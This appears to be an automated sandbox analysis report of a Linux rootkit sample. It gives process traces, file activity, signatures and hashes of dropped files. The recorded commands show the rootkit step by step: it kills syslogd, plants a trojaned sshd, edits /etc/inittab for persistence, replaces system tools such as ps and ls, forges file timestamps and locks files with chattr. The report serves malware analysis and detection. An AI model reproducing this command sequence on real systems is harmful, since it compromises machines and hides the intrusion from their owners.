| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/70/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/37/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/676/stat | /bin/pidof | N/A |
| File opened for reading | /proc/36/stat | /bin/pidof | N/A |
| File opened for reading | /proc/337/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/711/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/710/stat | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/2/stat | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/grep
[grep -v ^$]
/bin/grep
[grep @]
/usr/bin/cut
[cut -d @ -f 2]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/grep
[grep -v ttyload]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v getty]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/rm
[rm -rf /tmp/.procs]
/bin/cat
[cat /tmp/.stats]
/bin/grep
[grep 443]
/bin/grep
[grep http]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/grep
[grep inet addr:]
/usr/bin/cut
[cut -c6-]
/usr/bin/awk
[awk -F {print $2} ]
/bin/hostname
[hostname -f]
/bin/uname
[uname -a]
/usr/bin/awk
[awk { print $11 }]
/bin/cat
[cat /tmp/info_tmp]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/usr/bin/awk
[awk {print $3}]
/bin/hostname
[hostname -i]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep eth]
/usr/bin/wc
[wc -l]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 47 - 15]
/sbin/iptables
[/sbin/iptables -L input]
/usr/bin/head
[head -5]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-3 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-3 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-3 | udp |
Files
/var/cache/ldconfig/aux-cache~
| MD5 | 7b968c811ab74e54bd3a6edeaedb7fe4 |
| SHA1 | 84b645300ab3cc1fae00e20d515835cc2f6425c8 |
| SHA256 | 066ddcf734e62e679617b19fd043fb505f7bf1e9dcc99499a1538a23ac046ce9 |
| SHA512 | 3013c678e554ab3bffc6fb1d7705b869c60f3608b45f586b9b6e12a6609e5fd659a0d341a646aefbef0a8e91d6c7d78b8adba24f1a6d6b61c362119201cf76cc |
/etc/sh.conf
| MD5 | 31ef5d48a40eb5163899bd3473a2c9ff |
| SHA1 | 60e30f7942e4da70afc9e4a38b134f0057d72092 |
| SHA256 | 840cb83152de941a3a6d684fea05e24ceca557545341ca8d9794a1408554f552 |
| SHA512 | cd8ad33497eb3dd97bf884cd9d1c228f42b93364831ff945129acdd86b05fa79b09ca48a18c4993f78a3106638aec0e253350b727a535178778e94bd6b58050b |
/lib/libsh.so/bash
| MD5 | ff888a762cf16272e430e01339a82159 |
| SHA1 | 2aa621d5aad40292085f966fb58fd64c92f77781 |
| SHA256 | ee7e16d652d1c6ad490a8c5405a7196cd7081c541e6f81f6ed45e4987acf14ae |
| SHA512 | 421afe6b505c67e0753f0431caa0563dbe8ca29427a36c563226544c9d89dc6c38f6f788bc768854cd1b1ec39e7f08c3842441aa8eed4a865e6bb02197e2b2d0 |
/tmp/.init1
| MD5 | ba6ed6a3d425270d5374b0c2b54b3008 |
| SHA1 | 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec |
| SHA256 | 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359 |
| SHA512 | 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c |
/tmp/.init1
| MD5 | 0dae4739f83623a59236ecfabe00007b |
| SHA1 | 4b2b361ba9cf76213d2c4d6ba67e80099405f810 |
| SHA256 | 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0 |
| SHA512 | 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74 |
/tmp/.init1
| MD5 | 21df30feebe94d25ce99e861e3642895 |
| SHA1 | 3624439d7e9ac4463f83f1658205367ef27a2234 |
| SHA256 | d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5 |
| SHA512 | 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb |
/tmp/.init1
| MD5 | 74e8461d4c9dd715082f15ef51e3ecac |
| SHA1 | 0504be0510ac79c4f7c8d5477032408f9b63a651 |
| SHA256 | 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de |
| SHA512 | 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c |
/tmp/.init1
| MD5 | 8c053b4b674ebfcf6d38503608c5c8db |
| SHA1 | 9927d232e5bb15e3b6bbe461e0041d74649b963a |
| SHA256 | 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc |
| SHA512 | 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222 |
/usr/sbin/ttyload
| MD5 | b46702355aecfc0bd14c525655eccb8b |
| SHA1 | 85ae2258fdf63f04130470356e4d0ba13cce49b4 |
| SHA256 | d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7 |
| SHA512 | db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151 |
/usr/sbin/ttyload
| MD5 | 53e75bf7964b0fb15cbe3028a151ed65 |
| SHA1 | 116589e3b65166f73be2c6e8bb3b09c07641a762 |
| SHA256 | 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805 |
| SHA512 | ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316 |
/tmp/.shmd5
| MD5 | eec7232ba4d5ca3a2eb8799c26a874fd |
| SHA1 | c6e9b68130f82ab8b5c5355db53815dbfe10cda6 |
| SHA256 | 1201688781c6ba66a453381af6ea1e639bdea07642772195a76b5c683b001a2c |
| SHA512 | c8e23cac2324fd88dcb841a6175ae8e866c2bc8655aa7acd9db98e92b5a0856d9e026be7a26592d7b3acbed38a9c31b4b067fbe515600dac2ad01e51ea6faebc |
/tmp/.shmd5
| MD5 | 3511cf9f47b8905d2b9a331cd07f15d5 |
| SHA1 | 8024660584a833ed071f4c05cb86b2705fb187b2 |
| SHA256 | 7d7136b0834f12e5ae862511e4f6bdc655ee3f6648386b68bbb7e7fe3e8bfcc4 |
| SHA512 | 7c60426f7b9e0f11fd4bdf767f8194b0d2ea262798cabf7e40d520baabf7ec963c403ec906e165f7fd245786b6830c2079148398fec76d3038eb4555856bf49f |
/tmp/.shmd5
| MD5 | 03ca2cd1e2d14b124a9a88d8124266d9 |
| SHA1 | f1d4faa755b0ac235fe86e530acdb3385604c692 |
| SHA256 | 4b69279b67e2c5667eadb2f675e48f621dafea5e5889a61a6d861977b6b843b3 |
| SHA512 | 8593d08285705ed5b44f0ca81b68fc9b18503a168ccda677cd063544c5939b9c135d3ad3f7eef8296305ecde03029e32b4d6b8ceb6bd85a723230b34704aed70 |
/tmp/.shmd5
| MD5 | 14fe942e9e6a964a58c8078c44be033e |
| SHA1 | 61a772dfd7e9c8638c34e8779bb861b087d28f0f |
| SHA256 | 0a75bd4d0fb7b678d23edf9600fe2afd221d0a4ed7373d134b408cdeb0423c2a |
| SHA512 | 73459874ac59d34b95b43e2a17df819a43c983c752a73b26497d305f1d97c62be6b074e607362e4a8c3df59fa5cc0c8e58103878a8ca292c020663d2d9017cbd |
/tmp/.shmd5
| MD5 | 491e4be7ee03da344ef0369c79bdc148 |
| SHA1 | 24374dfc09d9121f86fd9a2df2b0711a2518fd13 |
| SHA256 | 8b0e0964567e00035e4ed334601488e6f618e2b0ab5133b1bcc6a51cba88116d |
| SHA512 | 9898bc7089452fcbe365a6b8ac0c8f9f2e5e90346fc56490f527c1ec559c65c9a9690ac7593c983f08658f0792f676e852ef5b62e735d3db1ea414d06b9849c2 |
/usr/lib/libsh/.backup/ps
| MD5 | 7731870ca48e3c4e975b31faf2a7ba89 |
| SHA1 | e23c09034e8967cdbcacca35081798309ece06c8 |
| SHA256 | 3ea8be1ed1173eaa225d37e5275f18a1e14bd4b20e1bdbd943a283da099849d2 |
| SHA512 | e046f20d8d2b4e60b36aa1e1da50d0c61df0771ea4aa85c4bd85d16fff8ffef4c641702d750b1d4e884d350cba6a6e1c2540d2a1de6ea37459fc7ed6a69e4b48 |
/usr/lib/libsh/.backup/top
| MD5 | 09d15bc7f151effb4cd91a34973db447 |
| SHA1 | 7a8bf06f56f3ed762e387eae5ea24175463180c9 |
| SHA256 | 6f025fa3a97b0037bef8e95ae9e8040f4bb5dbac2fea19431c1456c6cbd0aaf9 |
| SHA512 | 24040dfa79c81df8fb052b0525799ad2f9cdb312b5c480c7c11507c38ab8ece091ab81bcd56bc04ed09a2dabeccadad09f926f27a97fad8c80b6e99ba38fb0c1 |
/usr/lib/libsh/.backup/ls
| MD5 | 7ca1e501765636270399488edd0e7d9c |
| SHA1 | 6ae05048996a56fc5142c6e96e6c01b12923e546 |
| SHA256 | 8446452e20fb285524114fa4a2bbd87815e79dc8d3dff5ebb8fa676a5a1343d7 |
| SHA512 | a1c099c0da7065c59b9aa5f394a66ada208fb9a1d6a614c5536156b728273dbe41a0c79809891431cbb9737c79c325f8c8449c20a02dc0780fd444ee86e49677 |
/usr/lib/libsh/.backup/find
| MD5 | bb4edcad76062a76284c69f5fe4e50ea |
| SHA1 | 86055be4ce94fa3cffa9924e7b511e95df636606 |
| SHA256 | b7e25e128c130473f33c5135c78f591f35d7c4a7c5e1246c12eaa298db453474 |
| SHA512 | 254acc62d2f83f5a4686adcf3fe6ad4697f392c288c5baa323830bb6f2466c303fd7bc9f237e98b2ca76bc3abb6b4c264e042be8c4291ae5cc21b2189d996521 |
/usr/lib/libsh/.backup/pstree
| MD5 | 2c17377618ebb2190e5d6ad061bfdc25 |
| SHA1 | b6f51f2a8533f6e96f84a74512307049d8cfbc5f |
| SHA256 | 6f53043d6cff4c6fa296090037e0e7ffa5e844041f8a508c97d0434015b7c24e |
| SHA512 | 5a385ea98d16248bbb69a5b368f5a11349fbac4eadc73f172b0836676c47be02bc1fae64787fb07df9da7aeeecada5b34ee32de4eca0055db361b12c0d34dc75 |
/usr/lib/libsh/.backup/md5sum
| MD5 | 49b825db57efc929fb6904b08db7ac69 |
| SHA1 | 25e6f45827e620ad5eee782a91c12f7496098dc2 |
| SHA256 | 3e3625089a3e524eec5e6750435be90b61cf0de283308c91b0b0f8cac3f6e592 |
| SHA512 | 89f08142643c99bf8b5b053528a8d336360491aea0eeaf526f481a2702bc2fa0089567b9a7c6c59a549a72734e629287b14282fa0cd06d8df759fa94d04bb5be |
/tmp/.procs
| MD5 | 9c820866fe4cfc9df1c2797b381b07be |
| SHA1 | cad618615fbcc26d4e9f206dc1d12f989b2bdc55 |
| SHA256 | dbcc843ddf5533b1a4f552f0c283030dcf168621a61f9d59eb6466165bc379ff |
| SHA512 | 503efab54d47f43b1823aa1029c18fda434fad96377c6913e0bf38eed9cad2d12f32379e2269c962c20bfd67c88619643f069c5e94738646b6266ad06b9a75ff |
/tmp/info_tmp
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
4s
Max time network
129s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/600/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1296/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1499/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/204/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1500/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/513/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1127/stat | /bin/pidof | N/A |
| File opened for reading | /proc/512/status | /bin/ps | N/A |
| File opened for reading | /proc/565/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1127/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/777/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/984/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1136/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1296/stat | /bin/pidof | N/A |
| File opened for reading | /proc/25/stat | /bin/ps | N/A |
| File opened for reading | /proc/777/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1305/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/160/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/204/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/163/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1248/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/166/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/440/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1183/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/174/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/29/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1119/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1147/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/992/stat | /bin/pidof | N/A |
| File opened for reading | /proc/528/stat | /bin/ps | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/442/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1144/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/137/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/984/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/5/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/161/stat | /bin/pidof | N/A |
| File opened for reading | /proc/468/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/83/stat | /bin/pidof | N/A |
| File opened for reading | /proc/89/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/1016/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1180/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1310/status | /bin/ps | N/A |
| File opened for reading | /proc/992/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1142/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/174/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1068/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/322/status | /bin/ps | N/A |
| File opened for reading | /proc/468/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1284/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1058/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1505/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1182/cmdline | /bin/pidof | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
